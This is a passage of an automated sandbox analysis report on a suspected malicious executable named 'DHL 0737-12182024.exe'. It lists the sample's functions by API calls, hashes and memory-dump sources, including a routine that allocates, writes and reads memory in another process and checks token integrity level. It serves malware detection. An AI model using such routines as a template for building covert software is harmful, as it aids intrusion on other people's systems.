                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                            • String ID:
                                                                                            • API String ID: 2833360925-0
                                                                                            • Opcode ID: 64ec1cba3fc2a79fae91ffd961d579e956a29a5940e0678c35ca348444a62ae3
                                                                                            • Instruction ID: 4523e8ece75ae5b28b8e56fd0c50932bc91ca3c42e5c49d379acb5cffcf54b86
                                                                                            • Opcode Fuzzy Hash: 64ec1cba3fc2a79fae91ffd961d579e956a29a5940e0678c35ca348444a62ae3
                                                                                            • Instruction Fuzzy Hash: 5C011331D01A2DDBCF00ABE9ED59AEDBF78FF09701F010656E942F2241CB7096548BA2
                                                                                            Function 008810F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00881114
                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881120
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 0088112F
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00880B9B,?,?,?), ref: 00881136
                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0088114D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 842720411-0
                                                                                            • Opcode ID: 77d93323bcccbcd0ae4ea8998700ffcdcff9f2c21cb50a2c769fcb0d577862e1
                                                                                            • Instruction ID: 1163c47039a680696f790f43a84d8fd893b1e2889685ff2baf44208945238af7
                                                                                            • Opcode Fuzzy Hash: 77d93323bcccbcd0ae4ea8998700ffcdcff9f2c21cb50a2c769fcb0d577862e1
                                                                                            • Instruction Fuzzy Hash: 4F011979200605BFDB115FA9DC4DAAA3F6EFF893A0B204519FA45D7360DE31DC019B60
                                                                                            Function 00880FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00880FCA
                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00880FD6
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00880FE5
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00880FEC
                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00881002
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: cdb968fd5db020faf1e1946b2909336bc41130622b421397fcbbd52eb01b5f6c
                                                                                            • Instruction ID: bfa6a92f5dddb742dd2486d0f0e2b6575dabc34fd1293215f6dd263530dd6cde
                                                                                            • Opcode Fuzzy Hash: cdb968fd5db020faf1e1946b2909336bc41130622b421397fcbbd52eb01b5f6c
                                                                                            • Instruction Fuzzy Hash: FCF04975200701ABDB216FA89C4DF563FADFF89B62F104525FA45D6251CA70DC418A60
                                                                                            Function 00881014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0088102A
                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00881036
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881045
                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0088104C
                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                            • String ID:
                                                                                            • API String ID: 44706859-0
                                                                                            • Opcode ID: 25a9e0236f006b216d79791a4665e3420a59c56c864629389e5530fc4d8f7395
                                                                                            • Instruction ID: b2b94eaa05c041626392540b28a4ab323bffa82a78c701c20e63bb859be3d550
                                                                                            • Opcode Fuzzy Hash: 25a9e0236f006b216d79791a4665e3420a59c56c864629389e5530fc4d8f7395
                                                                                            • Instruction Fuzzy Hash: 49F04975200701ABDB21AFA8EC4DF573FADFF89761F100525FA45D6250CA70E8418A60
                                                                                            Function 0089030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890324
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890331
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 0089033E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 0089034B
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890358
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0089017D,?,008932FC,?,00000001,00862592,?), ref: 00890365
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: a67595812ecb0845d29dad65dab548031eb2ba8378ea78fb1d73649cb80b00cd
                                                                                            • Instruction ID: 408edb30e4d4cf5f8d842cc22e7d7d733cd76859fb2a1ac467bcc10f3cb9fcab
                                                                                            • Opcode Fuzzy Hash: a67595812ecb0845d29dad65dab548031eb2ba8378ea78fb1d73649cb80b00cd
                                                                                            • Instruction Fuzzy Hash: EC01A272800B159FCB30AF66D880412F7F5FF503153198A3FD19692A31C371A954EF80
                                                                                            Function 0085D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0085D752
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085D764
                                                                                            • _free.LIBCMT ref: 0085D776
                                                                                            • _free.LIBCMT ref: 0085D788
                                                                                            • _free.LIBCMT ref: 0085D79A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: dde47df4225a5637febab7dd4ae4c964382fce3c4a7f8b8ebc214f326ba33533
                                                                                            • Instruction ID: 7dec557a671a2e3547f34d2445dd5e11bad4ed8ea04135df25f98498ebbb43d5
                                                                                            • Opcode Fuzzy Hash: dde47df4225a5637febab7dd4ae4c964382fce3c4a7f8b8ebc214f326ba33533
                                                                                            • Instruction Fuzzy Hash: E9F06232904358AB8635FB68F9C1D567FDDFB093127A40805FC48EB602CB30FC888661
                                                                                            Function 00885C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885C58
                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00885C6F
                                                                                            • MessageBeep.USER32(00000000), ref: 00885C87
                                                                                            • KillTimer.USER32(?,0000040A), ref: 00885CA3
                                                                                            • EndDialog.USER32(?,00000001), ref: 00885CBD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3741023627-0
                                                                                            • Opcode ID: 5bd1ee65c6ea364970dc66a1776b0753d3a3f41eac9496d728444371ef4d23e5
                                                                                            • Instruction ID: 7c145ce4f2d8db9802031e8f0bb1f71ff064e6598b27834bfff831947396017d
                                                                                            • Opcode Fuzzy Hash: 5bd1ee65c6ea364970dc66a1776b0753d3a3f41eac9496d728444371ef4d23e5
                                                                                            • Instruction Fuzzy Hash: 96018170500B04ABEB316B50EE4EFA67BB9FB11B05F00165DA583E14E1DBF4A9848F90
                                                                                            Function 008522A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 008522BE
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 008522D0
                                                                                            • _free.LIBCMT ref: 008522E3
                                                                                            • _free.LIBCMT ref: 008522F4
                                                                                            • _free.LIBCMT ref: 00852305
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: ab5d33abed9099bfe3ccb74e3314f8dbf315286b4d68f5a0f2b41280ddd1d614
                                                                                            • Instruction ID: 327638ac579cbb3ec002d0632501a2a7c28073ea663e75c945c8813a94b41d38
                                                                                            • Opcode Fuzzy Hash: ab5d33abed9099bfe3ccb74e3314f8dbf315286b4d68f5a0f2b41280ddd1d614
                                                                                            • Instruction Fuzzy Hash: F2F05E748101209F8A12EFB8BC41DA83F64F71A762B00051AF824E63B6CF310816EFE5
                                                                                            Function 008395C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EndPath.GDI32(?), ref: 008395D4
                                                                                            • StrokeAndFillPath.GDI32(?,?,008771F7,00000000,?,?,?), ref: 008395F0
                                                                                            • SelectObject.GDI32(?,00000000), ref: 00839603
                                                                                            • DeleteObject.GDI32 ref: 00839616
                                                                                            • StrokePath.GDI32(?), ref: 00839631
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                            • String ID:
                                                                                            • API String ID: 2625713937-0
                                                                                            • Opcode ID: fd770c88f94220a4a7a089632a6bcfb7707d40b65b59d18b72f91f8881bca418
                                                                                            • Instruction ID: 17d0a58f0a7d09945232d3f5c2fafe85aac32f4a11e542857daf625c537dec72
                                                                                            • Opcode Fuzzy Hash: fd770c88f94220a4a7a089632a6bcfb7707d40b65b59d18b72f91f8881bca418
                                                                                            • Instruction Fuzzy Hash: 0EF03730106608EBDB226F69ED1CB793F65FB50322F448314F4A5A50F0E7B08996DFA0
                                                                                            Function 00850F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __freea$_free
                                                                                            • String ID: a/p$am/pm
                                                                                            • API String ID: 3432400110-3206640213
                                                                                            • Opcode ID: 6ae192aff7030181fbc16dd3736c98fd5c25ea1e083e714515d7381dcd29f6a6
                                                                                            • Instruction ID: ecd2e40f53dbb97b11ddcc68afd3e6a8d065abbf70c1e87705f6ca2866ec0964
                                                                                            • Opcode Fuzzy Hash: 6ae192aff7030181fbc16dd3736c98fd5c25ea1e083e714515d7381dcd29f6a6
                                                                                            • Instruction Fuzzy Hash: 0AD1D03190020A9ACF249F68C8ADBFAB7B1FF05706F240159ED01DBB90D3799D88CB91
                                                                                            Function 008A7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00840242: EnterCriticalSection.KERNEL32(008F070C,008F1884,?,?,0083198B,008F2518,?,?,?,008212F9,00000000), ref: 0084024D
                                                                                              • Part of subcall function 00840242: LeaveCriticalSection.KERNEL32(008F070C,?,0083198B,008F2518,?,?,?,008212F9,00000000), ref: 0084028A
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008400A3: __onexit.LIBCMT ref: 008400A9
                                                                                            • __Init_thread_footer.LIBCMT ref: 008A7BFB
                                                                                              • Part of subcall function 008401F8: EnterCriticalSection.KERNEL32(008F070C,?,?,00838747,008F2514), ref: 00840202
                                                                                              • Part of subcall function 008401F8: LeaveCriticalSection.KERNEL32(008F070C,?,00838747,008F2514), ref: 00840235
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                            • API String ID: 535116098-3733170431
                                                                                            • Opcode ID: 2c0595cbd0f0a5edcbe0164e8ecc8c90e628c96f5b6b15791f84243a1aa8d376
                                                                                            • Instruction ID: f151f78f4c8fef578b6395bbf23c23522b9413eb90ada36eca824f86bbeddf11
                                                                                            • Opcode Fuzzy Hash: 2c0595cbd0f0a5edcbe0164e8ecc8c90e628c96f5b6b15791f84243a1aa8d376
                                                                                            • Instruction Fuzzy Hash: BB918A70A04209EFDB04EF98D8909BDB7B1FF4A304F108059F906DB692DB71AE85EB51
                                                                                            Function 00882716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0088B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008821D0,?,?,00000034,00000800,?,00000034), ref: 0088B42D
                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00882760
                                                                                              • Part of subcall function 0088B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0088B3F8
                                                                                              • Part of subcall function 0088B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0088B355
                                                                                              • Part of subcall function 0088B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00882194,00000034,?,?,00001004,00000000,00000000), ref: 0088B365
                                                                                              • Part of subcall function 0088B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00882194,00000034,?,?,00001004,00000000,00000000), ref: 0088B37B
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008827CD
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0088281A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                            • String ID: @
                                                                                            • API String ID: 4150878124-2766056989
                                                                                            • Opcode ID: 9472b3fcb64b1668346078721449f316ae2c17777778b986efa1709231428af6
                                                                                            • Instruction ID: 34f58f54379466b7df2a31b193c88d71579e6168854153d747ff56b3c227e9a3
                                                                                            • Opcode Fuzzy Hash: 9472b3fcb64b1668346078721449f316ae2c17777778b986efa1709231428af6
                                                                                            • Instruction Fuzzy Hash: 29410D76900218BFDB10EBA8CD45ADEBBB8FF49700F104059FA55B7181DB706E45CB61
                                                                                            Function 0085172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL 0737-12182024.exe,00000104), ref: 00851769
                                                                                            • _free.LIBCMT ref: 00851834
                                                                                            • _free.LIBCMT ref: 0085183E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                            • API String ID: 2506810119-1900443643
                                                                                            • Opcode ID: 29e363d5de06b27941286483541d58b49236fffbd4eed48ec0a8b4fb7e75b39f
                                                                                            • Instruction ID: fefee21b81d007d1c3a9f8b5787193eb48e5baa05f2076db7bf14d42bb0924f4
                                                                                            • Opcode Fuzzy Hash: 29e363d5de06b27941286483541d58b49236fffbd4eed48ec0a8b4fb7e75b39f
                                                                                            • Instruction Fuzzy Hash: C9314175A00218EFDF21DBAD9889EAEBBBCFB89311B144166F904D7211D6B04E48CB91
                                                                                            Function 0088C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0088C306
                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0088C34C
                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008F1990,00B38200), ref: 0088C395
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                            • String ID: 0
                                                                                            • API String ID: 135850232-4108050209
                                                                                            • Opcode ID: 4be5835d2f65fa5488371d427a6e7a2b2530fd2c7b5bbeb39f9fa0803f0a2216
                                                                                            • Instruction ID: 300111c609ac8fdfbc09966aa5a700ea6c5693518dddf30f243c722bbb209c83
                                                                                            • Opcode Fuzzy Hash: 4be5835d2f65fa5488371d427a6e7a2b2530fd2c7b5bbeb39f9fa0803f0a2216
                                                                                            • Instruction Fuzzy Hash: 9F418C712043019FD720EF29D885B5ABBE8FF85324F148A2DF9A5D7395D730A905CB62
